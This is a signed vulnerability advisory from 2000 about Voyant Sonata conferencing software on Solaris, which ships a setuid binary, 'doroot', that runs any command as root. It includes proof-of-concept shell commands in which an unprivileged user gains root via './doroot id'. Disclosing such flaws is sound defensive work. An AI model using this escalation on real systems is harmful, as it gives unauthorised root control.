Voyant Technologies Sonata Conferencing Software v3.x on Solaris 2.x comes with the setuid binary doroot which executes any command as root.
66e1e97f64c7220d0c49571196c3c0b688f31aa0b1d4177776bcaca25289e18f
Here you go alan!
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Vulnerability Report #2 For Voyant Technologies Sonata
Conferencing product.
Larry W. Cashdollar
Vapid Labs
Date Published: 12/18/2000
Advisory ID: 12182000-02
CVE CAN: None currently assigned.
Title: Sonata doroot command vulnerability.
Class: Design Error
Remotely Exploitable: no
Locally Exploitable: Yes
Vulnerability Description:
The setuid binary doroot does exactly what it says. It executes its
command line argument as root. This is really silly and I dont know why it would need to exist.
Vulnerable Packages/Systems: Sonata v3.x on Solaris 2.x.
Vendor notified on: 11/30/2000
Solution/Vendor Information/Workaround:
The vendor has told us in so many words that the security of the conferencing system is up to the customer.
This will make it pretty difficult to make modifications to our system since it is production and we can't have any downtime.
I would contact Voyant anyhow for a solution. I can not test the affects of removing the setuid bit on our systems until later this week.
Credits:
Larry W. Cashdollar
http://vapid.betteros.org
Technical Description - Exploit/Concept Code:
$ cd /opt/TK/tk4.1/library/demos
$ id
uid=60001(nobody) gid=60001(nobody)
$ ./doroot id
uid=60001(nobody) gid=60001(nobody) euid=0(root)
$ ls -l doroot
- -rwsr-xr-x 1 root other 6224 Mar 12 1999 doroot
References:
Sonata product page.
http://www.voyanttech.com/displaypage.cfm?pid=27&toppid=22
Vapid Labs.
http://vapid.betteros.org
Email: Larry W. Cashdollar <lwc@vapid.betteros.org>
DISCLAIMER:
The contents of this advisory are copyright (c) 2000 Larry W. Cashdollar and
may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.
Ver 2.4 11/30/2000
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (OpenBSD)
Comment: For info see http://www.gnupg.org
iEYEARECAAYFAjo+7iMACgkQ1HPgUEhXV2j6JwCfXo2oo4exnz5Zq1jHwPRatF4w
6SMAnA9Q2c/CvMRrGiydj0lqx1wmjZP7
=8tVa
-----END PGP SIGNATURE-----